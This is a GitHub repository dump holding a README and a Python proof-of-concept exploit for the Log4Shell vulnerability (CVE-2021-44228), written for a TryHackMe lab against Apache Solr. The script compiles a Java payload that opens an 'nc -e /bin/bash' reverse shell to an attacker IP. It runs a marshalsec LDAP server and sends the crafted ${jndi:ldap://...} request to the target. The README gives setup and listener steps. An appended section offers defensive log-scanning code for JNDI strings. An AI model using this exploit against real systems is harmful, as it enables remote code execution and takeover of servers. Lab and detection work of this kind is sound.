├── 1.png
├── 2.png
├── 4.png
├── README.md
└── poc.py

/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ab0x90/CVE-2021-44228_PoC/HEAD/1.png
--------------------------------------------------------------------------------
/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ab0x90/CVE-2021-44228_PoC/HEAD/2.png
--------------------------------------------------------------------------------
/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ab0x90/CVE-2021-44228_PoC/HEAD/4.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# POC for CVE-2021-44228

This python script was created while I was working on the TryHackMe room for [Log4j](https://tryhackme.com/room/solar). While this was created with default variables for this room, I used argparse to make the script versatile for a GET request. All necessary variables can be changed with different options; see -h for more information.


# Setup
Only my script is hosted here; it requires two other downloads to run properly, which I will give links for, but setting up the folders the way I did will allow the script to run without much effort. First create a log4j folder (or whatever name you want), then git clone this repo, then move poc.py into /log4j/.

```sh
git clone https://github.com/ab0x90/CVE-2021-44228_PoC.git
```


Next clone [marshalsec](https://github.com/mbechler/marshalsec) in the same directory you just created, and then build it using maven.

```sh
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
```


Lastly, you will need to [download](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html) some version of Java 8. For this script, the default value for -j is 'jdk1.8.0_20'.

The new directory should look like this when everything is extracted.
```sh
kali@kali-[~/tools/Exploits/log4j]$ls -al
total 338448
drwxr-xr-x 5 kali kali 4096 Dec 14 15:22 .
drwx------ 3 kali kali 4096 Dec 14 14:34 ..
drwxr-xr-x 8 kali kali 4096 Jul 30  2014 jdk1.8.0_20
drwxr-xr-x 5 kali kali 4096 Dec 14 14:40 marshalsec
-rw-r--r-- 1 kali kali 2781 Dec 14 16:02 poc.py
```

After this, setup is complete. Note that if you would like or need to use a different version of java, this can be done using -j NAME_OF_JAVA_FOLDER.

# Usage

Help Menu


![](1.png)


Included in the script is the payload provided in the THM room; change the IP/port to whatever you want to use.

![](2.png)


Start a netcat listener to catch the shell on the port specified in the java_payload.

Start a python web server on port 8000.

Example command:
```sh
python3 poc.py -l 10.6.20.239 -i 10.10.64.53 -p 8983
```

Example output and reverse shell:


![](4.png)
--------------------------------------------------------------------------------
/poc.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

import argparse
import os
import threading
import time

import requests
from colorama import Fore


green = Fore.GREEN
red = Fore.RED
reset = Fore.RESET


def get_arguments():
    parser = argparse.ArgumentParser(description='CVE-2021-44228 PoC for web requests')
    parser.add_argument('-i', dest='ip_addr', type=str, required=True, help='IP address to target')
    parser.add_argument('-j', dest='java', default='jdk1.8.0_20/bin/java', type=str, help='Java version to use')
    parser.add_argument('-p', dest='rport', type=str, required=True, help='Remote port to target')
    parser.add_argument('-u', dest='user_input', default='/solr/admin/cores?foo=', type=str, help='The vulnerable input point (the rest of the URL ex: /solr/admin/cores?foo=)')
    parser.add_argument('-l', dest='local_ip', type=str, required=True, help='The local IP address used for the crafted URL')
    parser.add_argument('-L', dest='local_port', default='8000', type=str, help='The local port used to point at the python web server')
    return parser.parse_args()


#CHANGE THIS IP ADDRESS OR ENTIRE PAYLOAD
java_payload = ("""

public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 10.6.20.239 9999");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

""")


#write the payload to a file and compile it with the javac next to the chosen java binary
def write_payload():
    with open("Exploit.java", "w") as f:
        f.write(java_payload)
    print(red + "\n[+] " + reset + "Compiling the payload using javac\n")
    os.system(f"./{args.java}c Exploit.java")


#send the payload via a crafted URL
def send_payload():
    #Craft jndi payload (marshalsec's LDAPRefServer listens on 1389 by default)
    jndi = "${jndi:ldap://" + args.local_ip + ":" + "1389/Exploit}"
    print(jndi)

    #Create the url and send the request
    url = "http://" + args.ip_addr + ":" + args.rport + args.user_input + jndi
    print(url)
    response = requests.get(url)
    print(f"[*] Target answered with HTTP {response.status_code}")


#starts the LDAPRefServer; run a python web server on the -L port (default 8000) in the directory where the script is
def marshalsec():
    #use marshalsec to run the LDAPRefServer, which redirects the lookup to the web server hosting Exploit.class
    os.system(f"./{args.java} -cp marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://{args.local_ip}:{args.local_port}/#Exploit")


print(red + "\n****PoC for CVE-2021-44228****.")
print("Based on Apache Solr, change values as needed\n")
print("Make sure you are running a web server on port 8000 (python works great)\nand running a netcat listener on the port specified in the java payload\n" + reset)


args = get_arguments()

print(red + "[+] " + reset + "Starting marshalsec LDAPRefServer\n")
#non-daemon thread: the LDAP server keeps running after the request is sent so it can answer the target's lookup
threading.Thread(target=marshalsec).start()
time.sleep(3)

print(red + "\n[+] " + reset + "Writing the payload to a file\n")
write_payload()


print(red + "\n[+] " + reset + "Sending the payload, check your listener\n")
send_payload()

--------------------------------------------------------------------------------
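As a defender-side counterpart, here is an added example (not part of this repository) that scans web-server access-log lines for the `${jndi:...}` lookup string the script injects, percent-decoding the query string first, and extracts the callback host and port so the outbound LDAP connection (port 1389 in this PoC) can be hunted in egress logs. The log lines are constructed samples, not real captures.

```python
import re
from urllib.parse import unquote

# Matches the lookup the PoC injects, e.g. ${jndi:ldap://10.6.20.239:1389/Exploit};
# case-insensitive and scheme-agnostic (ldap, rmi, dns, ...).
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>[^}\s]*)\}",
    re.IGNORECASE,
)


def find_jndi_lookups(text):
    """Return a dict per JNDI lookup found in text.

    The text is percent-decoded first: the payload travels in a GET query
    string, so web servers usually log it URL-encoded.
    """
    hits = []
    for m in JNDI_RE.finditer(unquote(text)):
        hits.append({
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "path": m.group("path"),
            "raw": m.group(0),
        })
    return hits


def scan_access_log(lines):
    """Return (line_number, hit) pairs for every suspicious access-log line."""
    return [(n, hit) for n, line in enumerate(lines, 1) for hit in find_jndi_lookups(line)]


# Constructed sample lines: a benign Solr admin call, the PoC's request as the
# README shows it, and the same request as a server logs it percent-encoded.
SAMPLE_LOG = [
    '10.10.64.53 - - [14/Dec/2021:16:05:01 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 512',
    '10.6.20.239 - - [14/Dec/2021:16:05:09 +0000] "GET /solr/admin/cores?foo=${jndi:ldap://10.6.20.239:1389/Exploit} HTTP/1.1" 200 512',
    '10.6.20.239 - - [14/Dec/2021:16:05:12 +0000] "GET /solr/admin/cores?foo=%24%7Bjndi%3Aldap%3A%2F%2F10.6.20.239%3A1389%2FExploit%7D HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for n, hit in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {hit['scheme']} lookup to {hit['host']}:{hit['port']} ({hit['raw']})")
```

This matches only the literal lookup form the README shows; production rules also need to account for nested Log4j lookups that break the `jndi` token apart, and the extracted host:port should be cross-checked against egress connections from the application host.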